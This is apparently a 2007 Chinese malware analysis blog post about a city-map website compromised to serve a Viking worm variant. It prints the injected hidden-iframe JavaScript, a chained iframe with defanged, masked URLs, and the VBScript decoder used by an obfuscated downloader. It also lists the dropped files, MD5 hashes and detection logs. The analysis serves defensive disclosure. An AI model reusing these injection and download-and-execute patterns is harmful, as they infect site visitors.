某城市地图网站被挂上威金/Viking新变种Worm.Win32.Viking.ii

endurer 原创
2007-03-05 第1

打开该城市地图网站的网页,瑞星警告发现:Hack.Exploit.Vml.g

检查网页,发现网页所引用的 images/ad.js 包含代码:
/---
document.writeln("<iframe src=/"hxxp:////m***m**.k****is*163.com//index.html?id=5 /" width=0 height=0><//iframe>");
---/

hxxp://m***m**.k****is*163.com/index.html?id=5 包含代码:
/---
<iframe src="hxxp://web***.7***72*7***6.com/*0****.htm" width="0" height="0" frameborder="0"></iframe>
---/

hxxp://web***.7***72*7***6.com/*0****.htm 的标题为http NO FOUND,内容为VBScript脚本代码,功能是调用自定义函数:
/----
function rechange(k)
s=Split(k,",")
t=""
For i = 0 To UBound(s)
t=t+Chr(eval(s(i)))
Next
rechange=t
End Function
----/
对变量t的值进行解密并调用execute()执行。

解密后的代码是VBScript脚本代码,功能是利用 Microsoft.XMLHTTP 和 scrīpting.FileSystemObject 下载文件 0.exe,保存为 %temp%/svchost.exe和%temp%/svchost.vbs,并利用Shell.Application 对象Q 的 ShellExecute 方法 来运行。


文件说明符 : D:/test/0.exe
属性 : A---
获取文件版本信息大小失败!
创建时间 : 2007-3-5 12:33:14
修改时间 : 2007-3-5 12:33:14
访问时间 : 2007-3-5 12:34:20
大小 : 93240 字节 91.56 KB
MD5 : ef70c5791d050cc898319acbb044e847

Kaspersky 报为 Worm.Win32.Viking.ii

0.exe运行后会下载其它恶意文件并感染EXE文件。

下面是0.exe运行后Kaspersky 6的记录:
/----
已检测到: 风险软件 Trojan.generic 运行进程: D:/test/0.exe
已检测到: 木马程序 Trojan-PSW.Win32.Magania.jm 文件: C:/WINNT/system32/wincab.sys
已检测到: 木马程序 Trojan-PSW.Win32.OnLineGames.es 文件: C:/WINNT/SMSS.EXE
已检测到: 风险软件 Invader 运行进程: C:/WINNT/SVCHOST.EXE
已检测到: 风险软件 Invader (loader) 运行进程: C:/WINNT/explorer.exe
已检测到: 木马程序 Backdoor.Win32.Agent.alh 文件: C:/WINNT/system32/systemt.exe/UPack
已检测到: 木马程序 Trojan-PSW.Win32.OnLineGames.gs 文件: C:/Documents and Settings/pe/Local Settings/Temporary Internet Files/Content.IE5/ATKZUDI5/smsss[1].exe
已检测到: 木马程序 Trojan.Win32.Agent.abf 文件: C:/Documents and Settings/pe/Local Settings/Temporary Internet Files/Content.IE5/276BATUZ/lsasss[1].exe/PE_Patch/UPack
已检测到: 木马程序 Trojan-PSW.Win32.OnLineGames.es 文件: C:/Documents and Settings/pe/Local Settings/Temporary Internet Files/Content.IE5/CX67WL2N/avg[1].exe
已检测到: 木马程序 Trojan-PSW.Win32.OnLineGames.es 文件: C:/WINNT/CSRSS.exe
已检测到: 木马程序 Trojan-PSW.Win32.OnLineGames.es 文件: C:/Documents and Settings/pe/Local Settings/Temporary Internet Files/Content.IE5/MUT33WP4/datsc[1].exe
已检测到: 木马程序 Trojan-Downloader.Win32.Small.czl 文件: C:/WINNT/10Sy.exe
已检测到: 木马程序 Trojan-PSW.Win32.WOW.ec 文件: C:/Documents and Settings/pe/Local Settings/Temporary Internet Files/Content.IE5/O56R812F/adobesvc[1].exe
已检测到: 木马程序 Trojan-PSW.Win32.OnLineGames.es 文件: C:/Documents and Settings/pe/Local Settings/Temporary Internet Files/Content.IE5/E1ITG5SV/svchots[1].exe
已检测到: 木马程序 Trojan-Downloader.Win32.Small.czl 文件: C:/Documents and Settings/pe/Local Settings/Temporary Internet Files/Content.IE5/9ULFUMAW/mstcs[1].exe
----/

值得注意的是,病毒会搜索标题为AVP.AlertDialog的 Kaspersky 的警告窗口,模拟点击按钮“允许”和“跳过”
向 Kaspersky 的通知窗口(类名为:AVP.Product_Notification)发送WM_CLOSE消息结束该窗口。

所以用户无法进行操作。

用pe_xscan扫描,发现可疑项:
/---
pe_xscan by Purple Endurer
2007-3-5 12:44:24
Windows 2000 Service Pack 4(5.0.2195)
管理员用户组

[System Process] * 0
    C:/WINNT/system32/wsttrs.dll | 2007-3-5 12:37:47
C:/WINNT/Explorer.EXE * 928 | 2003-6-20 3:5:4 | Microsoft(R) Windows (R) 2000 Operating System | 5.00.3700.6690 | Windows Explorer | Copyright (C) Microsoft Corp. 1981-1999 | 5.00.3700.6690 | Microsoft Corporation| ? | explorer | EXPLORER.EXE
    C:/WINNT/RichDll.dll | 2007-3-5 12:37:41
    C:/WINNT/system32/wsttrs.dll | 2007-3-5 12:37:47
C:/WINNT/system32/internat.exe * 1176 | 2000-1-10 20:0:0 | Microsoft(R) Windows (R) 2000 Operating System | 5.00.2920.0000 | Keyboard Language Indicator Applet | Copyright (C) Microsoft Corp. 1994-1999 | 5.00.2920.0000 | Microsoft Corporation| ? | INTERNAT | INTERNAT.EXE
    C:/WINNT/system32/wsttrs.dll | 2007-3-5 12:37:47
D:/Program Files/Tencent/qq/QQ.exe * 516 | 2006-3-2 8:52:30 | TENCENT QQ | 0, 0, 0, 0 | QQ | Copyright ? 2005 | 0, 0, 0, 0 | TENCENT |  | COMQQD | QQ.exe
    C:/WINNT/system32/wsttrs.dll | 2007-3-5 12:37:47
D:/Program Files/Maxthon/Maxthon.exe * 904 | 2007-2-11 17:46:2 | Maxthon Application | 1, 5, 9, 80 | Maxthon Web Browser | Copyright (C) 2002 | 1, 5, 9, 80 | Maxthon International Ltd. | Maxthon | Maxthon | Maxthon.EXE
    C:/WINNT/system32/wsttrs.dll | 2007-3-5 12:37:47
D:/Program Files/EditPlus 2/editplus.exe * 588 | 2005-12-12 9:32:12 | EditPlus | 2, 2, 1, 330 | EditPlus | Copyright ? 1998-2005 ES-Computing | 2, 2, 1, 330 | ES-Computing | EditPlus | EditPlus | EDITPLUS.EXE
    C:/WINNT/system32/wsttrs.dll | 2007-3-5 12:37:47
C:/WINNT/system32/notepad.exe * 508 | 2000-1-10 20:0:0 | Microsoft(R) Windows (R) 2000 Operating System | 5.00.2140.1 | 记事本 | Copyright (C) Microsoft Corp. 1981-1999 | 5.00.2140.1 | Microsoft Corporation| ? | Notepad | NOTEPAD.EXE
    C:/WINNT/system32/wsttrs.dll | 2007-3-5 12:37:47
C:/WINNT/system32/conime.exe * 1476 | 2003-6-20 3:5:4 | Microsoft(R) Windows (R) 2000 Operating System | 5.00.2195.6655 | Console IME | Copyright (C) Microsoft Corp. 1981-1999 | 5.00.2195.6655 | Microsoft Corporation| ? | Console | CONIME.EXE
    C:/WINNT/system32/wsttrs.dll | 2007-3-5 12:37:47
D:/pe/tools/3.exe * 1508 | 2007-3-5 12:43:37
    C:/WINNT/system32/wsttrs.dll | 2007-3-5 12:37:47

O4 - HKLM/../Run: [wsttrs] C:/WINNT/SVCHOST.EXE

O23 - 服务: shiji (shiji) - C:/WINNT/system32/wincab.sys(手动启动)
---/


文件说明符 : C:/WINNT/system32/wsttrs.dll
属性 : A---
获取文件版本信息大小失败!
创建时间 : 2007-3-5 12:37:47
修改时间 : 2007-3-5 12:37:47
访问时间 : 2007-3-5 13:35:18
大小 : 23539 字节 22.1011 KB
MD5 : 6e25ea101a59463623725d6073058dc1

Kaspersky 报为: Trojan-PSW.Win32.Magania.jm.1

瑞星 报为:Trojan.PSW.WLOnline.jcv


文件说明符 : C:/WINNT/RichDll.dll
属性 : ----
获取文件版本信息大小失败!
创建时间 : 2007-3-5 12:37:41
修改时间 : 2007-3-5 12:37:41
访问时间 : 2007-3-5 13:38:25
大小 : 29721 字节 29.25 KB
MD5 : a936b1dba52bbbc79cf23f9d965d2646

Kaspersky 报为: Worm.Win32.Viking.ii


文件说明符 : C:/WINNT/SVCHOST.EXE
属性 : A---
获取文件版本信息大小失败!
创建时间 : 2007-3-5 12:37:46
修改时间 : 2007-3-5 12:37:46
访问时间 : 2007-3-5 13:39:4
大小 : 69859 字节 68.227 KB
MD5 : 2424f02a0ea72ffeae27f8b33fb5dfc9

Kaspersky 报为:Trojan-PSW.Win32.Magania.jm.1
瑞星 报为:Trojan.PSW.Roc.ad


文件说明符 : c:/WINNT/10Sy.exe
属性 : A---
获取文件版本信息大小失败!
创建时间 : 2007-3-5 12:38:15
修改时间 : 2007-3-5 13:47:44
访问时间 : 2007-3-5 13:49:17
大小 : 25072 字节 24.496 KB
MD5 : 12082524ff15f50f1c2ef2f9e2ac90a7

Kaspersky 报为:Trojan-Downloader.Win32.Small.czl
瑞星 报为:Trojan.PSW.LMir.mdw


文件说明符 : C:/WINNT/system32/systemt.exe
属性 : A---
获取文件版本信息大小失败!
创建时间 : 2007-3-5 12:37:56
修改时间 : 2007-3-5 12:59:27
访问时间 : 2007-3-5 13:0:32
大小 : 26130 字节 25.530 KB
MD5 : 8ae1afdb6a25569a5d55a4eb5389121c

Kaspersky报为: Backdoor.Win32.Agent.alh


文件说明符 : c:/Documents and Settings/pe/Local Settings/Temp/q9xtwt5.dll
属性 : ASH-
获取文件版本信息大小失败!
创建时间 : 2007-3-5 12:37:46
修改时间 : 2007-3-5 12:37:46
访问时间 : 2007-3-5 11:6:31
大小 : 32483 字节 31.739 KB
MD5 : b19d0273f347ed7e3dc4fb95a70f48a4

Kaspersky报为:Trojan-PSW.Win32.Magania.jm.1
瑞星报为:RootKit.Vanti.vr


文件说明符 : c:/Documents and Settings/pe/Local Settings/Temporary Internet Files/Content.IE5/ATKZUDI5/web[1].DLL
属性 : A---
获取文件版本信息大小失败!
创建时间 : 2007-3-5 12:59:1
修改时间 : 2007-3-5 12:59:1
访问时间 : 2007-3-5 13:27:43
大小 : 17227 字节 16.843 KB
MD5 : c68f384f846fc5943e8470ff37d9111d


文件说明符 : c:/Documents and Settings/pe/Local Settings/Temporary Internet Files/Content.IE5/ATKZUDI5/smsss[1].exe
属性 : A---
获取文件版本信息大小失败!
创建时间 : 2007-3-5 12:37:57
修改时间 : 2007-3-5 12:37:59
访问时间 : 2007-3-5 13:25:55
大小 : 13824 字节 13.512 KB
MD5 : 3f864049a2fde64042a82565d4ff92af

Kaspersky 报为:Trojan-PSW.Win32.OnLineGames.gs
瑞星报为:Trojan.PSW.ZhengTu.anc

文件说明符 : c:/Documents and Settings/pe/Local Settings/Temporary Internet Files/Content.IE5/276BATUZ/lsasss[1].exe
属性 : A---
获取文件版本信息大小失败!
创建时间 : 2007-3-5 12:38:0
修改时间 : 2007-3-5 12:38:1
访问时间 : 2007-3-5 13:23:29
大小 : 40968 字节 40.8 KB
MD5 : 23f203134804fa6f2d31667267595dc5

Kaspersky 报为:Trojan.Win32.Agent.abf
瑞星报为::Trojan.Agent.fii


文件说明符 : c:/Documents and Settings/pe/Local Settings/Temporary Internet Files/Content.IE5/CX67WL2N/avg[1].exe
属性 : A---
获取文件版本信息大小失败!
创建时间 : 2007-3-5 12:37:43
修改时间 : 2007-3-5 12:38:6
访问时间 : 2007-3-5 13:21:48
大小 : 13824 字节 13.512 KB
MD5 : 3cec40cb6a2ba1e57c91a083c10b09e4

此文件会复制为:c:/WINNT/SMSS.EXE

Kaspersky 报为:Trojan-PSW.Win32.OnLineGames.es
瑞星 报为:Trojan.PSW.OnlineGames.in

文件说明符 : c:/Documents and Settings/pe/Local Settings/Temporary Internet Files/Content.IE5/MUT33WP4/datsc[1].exe
属性 : A---
获取文件版本信息大小失败!
创建时间 : 2007-3-5 12:38:10
修改时间 : 2007-3-5 12:38:10
访问时间 : 2007-3-5 13:17:19
大小 : 13824 字节 13.512 KB
MD5 : a9b8b545f24b36e52fd0176db42becdd

Kaspersky报为:Trojan-PSW.Win32.OnLineGames.es
瑞星报为::Trojan.PSW.Agent.jdm


文件说明符 : c:/Documents and Settings/pe/Local Settings/Temporary Internet Files/Content.IE5/O56R812F/adobesvc[1].exe
属性 : A---
获取文件版本信息大小失败!
创建时间 : 2007-3-5 12:38:25
修改时间 : 2007-3-5 13:38:28
访问时间 : 2007-3-5 13:15:18
大小 : 226868 字节 221.564 KB
MD5 : 54ce2ffabb6ddefd26d5360d427870c2

Kaspersky报为:Trojan-PSW.Win32.WOW.ec


文件说明符 : c:/Documents and Settings/pe/Local Settings/Temporary Internet Files/Content.IE5/E1ITG5SV/svchots[1].exe
属性 : A---
获取文件版本信息大小失败!
创建时间 : 2007-3-5 12:38:6
修改时间 : 2007-3-5 12:38:32
访问时间 : 2007-3-5 13:13:13
大小 : 14848 字节 14.512 KB
MD5 : a4742619bf2f16aed92fdc8623ad0623

此文件被复制为:c:/WINNT/CSRSS.exe

Kaspersky报为:Trojan-PSW.Win32.OnLineGames.es


文件说明符 : c:/Documents and Settings/pe/Local Settings/Temporary Internet Files/Content.IE5/9ULFUMAW/inetinf[1].exe
属性 : A---
获取文件版本信息大小失败!
创建时间 : 2007-3-5 12:37:49
修改时间 : 2007-3-5 12:37:55
访问时间 : 2007-3-5 13:11:9
大小 : 279652 字节 273.100 KB
MD5 : 10a390602afad9926028116607ac094a

此文件被复制为c:/WINNT/SERVICES.EXE

Kaspersky 报为:Backdoor.Win32.Agent.alh

文件说明符 : c:/Documents and Settings/pe/Local Settings/Temporary Internet Files/Content.IE5/9ULFUMAW/mstcs[1].exe
属性 : A---
获取文件版本信息大小失败!
创建时间 : 2007-3-5 12:38:14
修改时间 : 2007-3-5 13:9:58
访问时间 : 2007-3-5 13:10:36
大小 : 25072 字节 24.496 KB
MD5 : 12082524ff15f50f1c2ef2f9e2ac90a7

Kaspersky报为:Trojan-Downloader.Win32.Small.czl
瑞星报为:Trojan.PSW.LMir.mdw

 

你可能感兴趣的:(c,windows,Microsoft,System,VBScript,internet)